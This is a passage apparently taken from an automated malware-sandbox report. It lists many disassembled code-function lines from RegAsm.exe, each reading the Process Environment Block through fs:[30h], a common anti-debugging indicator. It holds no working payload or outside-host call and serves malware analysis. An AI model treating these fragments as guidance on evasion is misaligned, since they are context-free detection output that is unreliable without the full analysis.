                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1260B mov eax, dword ptr fs:[00000030h]5_2_02D1260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7E609 mov eax, dword ptr fs:[00000030h]5_2_02D7E609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D36620 mov eax, dword ptr fs:[00000030h]5_2_02D36620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D38620 mov eax, dword ptr fs:[00000030h]5_2_02D38620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1E627 mov eax, dword ptr fs:[00000030h]5_2_02D1E627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0262C mov eax, dword ptr fs:[00000030h]5_2_02D0262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0C7C0 mov eax, dword ptr fs:[00000030h]5_2_02D0C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D807C3 mov eax, dword ptr fs:[00000030h]5_2_02D807C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D047FB mov eax, dword ptr fs:[00000030h]5_2_02D047FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D047FB mov eax, dword ptr fs:[00000030h]5_2_02D047FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8E7E1 mov eax, dword ptr fs:[00000030h]5_2_02D8E7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D227ED mov eax, dword ptr fs:[00000030h]5_2_02D227ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D227ED mov eax, dword ptr fs:[00000030h]5_2_02D227ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D227ED mov eax, dword ptr fs:[00000030h]5_2_02D227ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DA678E mov eax, dword ptr fs:[00000030h]5_2_02DA678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DB47A0 mov eax, dword ptr fs:[00000030h]5_2_02DB47A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D007AF mov eax, dword ptr fs:[00000030h]5_2_02D007AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D00750 mov eax, dword ptr fs:[00000030h]5_2_02D00750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42750 mov eax, dword ptr fs:[00000030h]5_2_02D42750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42750 mov eax, dword ptr fs:[00000030h]5_2_02D42750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8E75D mov eax, dword ptr fs:[00000030h]5_2_02D8E75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D84755 mov eax, dword ptr fs:[00000030h]5_2_02D84755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3674D mov esi, dword ptr fs:[00000030h]5_2_02D3674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3674D mov eax, dword ptr fs:[00000030h]5_2_02D3674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3674D mov eax, dword ptr fs:[00000030h]5_2_02D3674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D08770 mov eax, dword ptr fs:[00000030h]5_2_02D08770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10770 mov eax, dword ptr fs:[00000030h]5_2_02D10770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10770 mov eax, dword ptr fs:[00000030h]5_2_02D10770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10770 mov eax, dword ptr fs:[00000030h]5_2_02D10770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10770 mov eax, dword ptr fs:[00000030h]5_2_02D10770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10770 mov eax, dword ptr fs:[00000030h]5_2_02D10770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10770 mov eax, dword ptr fs:[00000030h]5_2_02D10770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10770 mov eax, dword ptr fs:[00000030h]5_2_02D10770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10770 mov eax, dword ptr fs:[00000030h]5_2_02D10770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10770 mov eax, dword ptr fs:[00000030h]5_2_02D10770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10770 mov eax, dword ptr fs:[00000030h]5_2_02D10770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10770 mov eax, dword ptr fs:[00000030h]5_2_02D10770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10770 mov eax, dword ptr fs:[00000030h]5_2_02D10770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D00710 mov eax, dword ptr fs:[00000030h]5_2_02D00710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D30710 mov eax, dword ptr fs:[00000030h]5_2_02D30710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3C700 mov eax, dword ptr fs:[00000030h]5_2_02D3C700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7C730 mov eax, dword ptr fs:[00000030h]5_2_02D7C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3273C mov eax, dword ptr fs:[00000030h]5_2_02D3273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3273C mov ecx, dword ptr fs:[00000030h]5_2_02D3273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3273C mov eax, dword ptr fs:[00000030h]5_2_02D3273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3C720 mov eax, dword ptr fs:[00000030h]5_2_02D3C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3C720 mov eax, dword ptr fs:[00000030h]5_2_02D3C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D004E5 mov ecx, dword ptr fs:[00000030h]5_2_02D004E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DBA49A mov eax, dword ptr fs:[00000030h]5_2_02DBA49A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D344B0 mov ecx, dword ptr fs:[00000030h]5_2_02D344B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8A4B0 mov eax, dword ptr fs:[00000030h]5_2_02D8A4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D064AB mov eax, dword ptr fs:[00000030h]5_2_02D064AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2245A mov eax, dword ptr fs:[00000030h]5_2_02D2245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DBA456 mov eax, dword ptr fs:[00000030h]5_2_02DBA456
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3E443 mov eax, dword ptr fs:[00000030h]5_2_02D3E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3E443 mov eax, dword ptr fs:[00000030h]5_2_02D3E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3E443 mov eax, dword ptr fs:[00000030h]5_2_02D3E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3E443 mov eax, dword ptr fs:[00000030h]5_2_02D3E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3E443 mov eax, dword ptr fs:[00000030h]5_2_02D3E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3E443 mov eax, dword ptr fs:[00000030h]5_2_02D3E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3E443 mov eax, dword ptr fs:[00000030h]5_2_02D3E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3E443 mov eax, dword ptr fs:[00000030h]5_2_02D3E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CF645D mov eax, dword ptr fs:[00000030h]5_2_02CF645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2A470 mov eax, dword ptr fs:[00000030h]5_2_02D2A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2A470 mov eax, dword ptr fs:[00000030h]5_2_02D2A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2A470 mov eax, dword ptr fs:[00000030h]5_2_02D2A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8C460 mov ecx, dword ptr fs:[00000030h]5_2_02D8C460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D38402 mov eax, dword ptr fs:[00000030h]5_2_02D38402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D38402 mov eax, dword ptr fs:[00000030h]5_2_02D38402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D38402 mov eax, dword ptr fs:[00000030h]5_2_02D38402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3A430 mov eax, dword ptr fs:[00000030h]5_2_02D3A430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFC427 mov eax, dword ptr fs:[00000030h]5_2_02CFC427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFE420 mov eax, dword ptr fs:[00000030h]5_2_02CFE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFE420 mov eax, dword ptr fs:[00000030h]5_2_02CFE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFE420 mov eax, dword ptr fs:[00000030h]5_2_02CFE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D86420 mov eax, dword ptr fs:[00000030h]5_2_02D86420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D86420 mov eax, dword ptr fs:[00000030h]5_2_02D86420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D86420 mov eax, dword ptr fs:[00000030h]5_2_02D86420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D86420 mov eax, dword ptr fs:[00000030h]5_2_02D86420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D86420 mov eax, dword ptr fs:[00000030h]5_2_02D86420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D86420 mov eax, dword ptr fs:[00000030h]5_2_02D86420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D86420 mov eax, dword ptr fs:[00000030h]5_2_02D86420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D065D0 mov eax, dword ptr fs:[00000030h]5_2_02D065D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3A5D0 mov eax, dword ptr fs:[00000030h]5_2_02D3A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3A5D0 mov eax, dword ptr fs:[00000030h]5_2_02D3A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3E5CF mov eax, dword ptr fs:[00000030h]5_2_02D3E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3E5CF mov eax, dword ptr fs:[00000030h]5_2_02D3E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D025E0 mov eax, dword ptr fs:[00000030h]5_2_02D025E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2E5E7 mov eax, dword ptr fs:[00000030h]5_2_02D2E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2E5E7 mov eax, dword ptr fs:[00000030h]5_2_02D2E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2E5E7 mov eax, dword ptr fs:[00000030h]5_2_02D2E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2E5E7 mov eax, dword ptr fs:[00000030h]5_2_02D2E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2E5E7 mov eax, dword ptr fs:[00000030h]5_2_02D2E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2E5E7 mov eax, dword ptr fs:[00000030h]5_2_02D2E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2E5E7 mov eax, dword ptr fs:[00000030h]5_2_02D2E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2E5E7 mov eax, dword ptr fs:[00000030h]5_2_02D2E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3C5ED mov eax, dword ptr fs:[00000030h]5_2_02D3C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3C5ED mov eax, dword ptr fs:[00000030h]5_2_02D3C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3E59C mov eax, dword ptr fs:[00000030h]5_2_02D3E59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D02582 mov eax, dword ptr fs:[00000030h]5_2_02D02582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D02582 mov ecx, dword ptr fs:[00000030h]5_2_02D02582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D34588 mov eax, dword ptr fs:[00000030h]5_2_02D34588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D245B1 mov eax, dword ptr fs:[00000030h]5_2_02D245B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D245B1 mov eax, dword ptr fs:[00000030h]5_2_02D245B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D805A7 mov eax, dword ptr fs:[00000030h]5_2_02D805A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D805A7 mov eax, dword ptr fs:[00000030h]5_2_02D805A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D805A7 mov eax, dword ptr fs:[00000030h]5_2_02D805A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D08550 mov eax, dword ptr fs:[00000030h]5_2_02D08550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D08550 mov eax, dword ptr fs:[00000030h]5_2_02D08550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3656A mov eax, dword ptr fs:[00000030h]5_2_02D3656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3656A mov eax, dword ptr fs:[00000030h]5_2_02D3656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3656A mov eax, dword ptr fs:[00000030h]5_2_02D3656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D96500 mov eax, dword ptr fs:[00000030h]5_2_02D96500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD4500 mov eax, dword ptr fs:[00000030h]5_2_02DD4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD4500 mov eax, dword ptr fs:[00000030h]5_2_02DD4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD4500 mov eax, dword ptr fs:[00000030h]5_2_02DD4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD4500 mov eax, dword ptr fs:[00000030h]5_2_02DD4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD4500 mov eax, dword ptr fs:[00000030h]5_2_02DD4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD4500 mov eax, dword ptr fs:[00000030h]5_2_02DD4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD4500 mov eax, dword ptr fs:[00000030h]5_2_02DD4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10535 mov eax, dword ptr fs:[00000030h]5_2_02D10535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10535 mov eax, dword ptr fs:[00000030h]5_2_02D10535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10535 mov eax, dword ptr fs:[00000030h]5_2_02D10535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10535 mov eax, dword ptr fs:[00000030h]5_2_02D10535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10535 mov eax, dword ptr fs:[00000030h]5_2_02D10535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10535 mov eax, dword ptr fs:[00000030h]5_2_02D10535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2E53E mov eax, dword ptr fs:[00000030h]5_2_02D2E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2E53E mov eax, dword ptr fs:[00000030h]5_2_02D2E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2E53E mov eax, dword ptr fs:[00000030h]5_2_02D2E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2E53E mov eax, dword ptr fs:[00000030h]5_2_02D2E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2E53E mov eax, dword ptr fs:[00000030h]5_2_02D2E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D00AD0 mov eax, dword ptr fs:[00000030h]5_2_02D00AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D34AD0 mov eax, dword ptr fs:[00000030h]5_2_02D34AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D34AD0 mov eax, dword ptr fs:[00000030h]5_2_02D34AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D56ACC mov eax, dword ptr fs:[00000030h]5_2_02D56ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D56ACC mov eax, dword ptr fs:[00000030h]5_2_02D56ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D56ACC mov eax, dword ptr fs:[00000030h]5_2_02D56ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3AAEE mov eax, dword ptr fs:[00000030h]5_2_02D3AAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3AAEE mov eax, dword ptr fs:[00000030h]5_2_02D3AAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D38A90 mov edx, dword ptr fs:[00000030h]5_2_02D38A90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0EA80 mov eax, dword ptr fs:[00000030h]5_2_02D0EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0EA80 mov eax, dword ptr fs:[00000030h]5_2_02D0EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0EA80 mov eax, dword ptr fs:[00000030h]5_2_02D0EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0EA80 mov eax, dword ptr fs:[00000030h]5_2_02D0EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0EA80 mov eax, dword ptr fs:[00000030h]5_2_02D0EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0EA80 mov eax, dword ptr fs:[00000030h]5_2_02D0EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0EA80 mov eax, dword ptr fs:[00000030h]5_2_02D0EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0EA80 mov eax, dword ptr fs:[00000030h]5_2_02D0EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0EA80 mov eax, dword ptr fs:[00000030h]5_2_02D0EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD4A80 mov eax, dword ptr fs:[00000030h]5_2_02DD4A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D08AA0 mov eax, dword ptr fs:[00000030h]5_2_02D08AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D08AA0 mov eax, dword ptr fs:[00000030h]5_2_02D08AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D56AA4 mov eax, dword ptr fs:[00000030h]5_2_02D56AA4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D06A50 mov eax, dword ptr fs:[00000030h]5_2_02D06A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D06A50 mov eax, dword ptr fs:[00000030h]5_2_02D06A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D06A50 mov eax, dword ptr fs:[00000030h]5_2_02D06A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D06A50 mov eax, dword ptr fs:[00000030h]5_2_02D06A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D06A50 mov eax, dword ptr fs:[00000030h]5_2_02D06A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D06A50 mov eax, dword ptr fs:[00000030h]5_2_02D06A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D06A50 mov eax, dword ptr fs:[00000030h]5_2_02D06A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10A5B mov eax, dword ptr fs:[00000030h]5_2_02D10A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10A5B mov eax, dword ptr fs:[00000030h]5_2_02D10A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7CA72 mov eax, dword ptr fs:[00000030h]5_2_02D7CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7CA72 mov eax, dword ptr fs:[00000030h]5_2_02D7CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAEA60 mov eax, dword ptr fs:[00000030h]5_2_02DAEA60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3CA6F mov eax, dword ptr fs:[00000030h]5_2_02D3CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3CA6F mov eax, dword ptr fs:[00000030h]5_2_02D3CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3CA6F mov eax, dword ptr fs:[00000030h]5_2_02D3CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8CA11 mov eax, dword ptr fs:[00000030h]5_2_02D8CA11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D24A35 mov eax, dword ptr fs:[00000030h]5_2_02D24A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D24A35 mov eax, dword ptr fs:[00000030h]5_2_02D24A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3CA38 mov eax, dword ptr fs:[00000030h]5_2_02D3CA38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3CA24 mov eax, dword ptr fs:[00000030h]5_2_02D3CA24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2EA2E mov eax, dword ptr fs:[00000030h]5_2_02D2EA2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAEBD0 mov eax, dword ptr fs:[00000030h]5_2_02DAEBD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D20BCB mov eax, dword ptr fs:[00000030h]5_2_02D20BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D20BCB mov eax, dword ptr fs:[00000030h]5_2_02D20BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D20BCB mov eax, dword ptr fs:[00000030h]5_2_02D20BCB
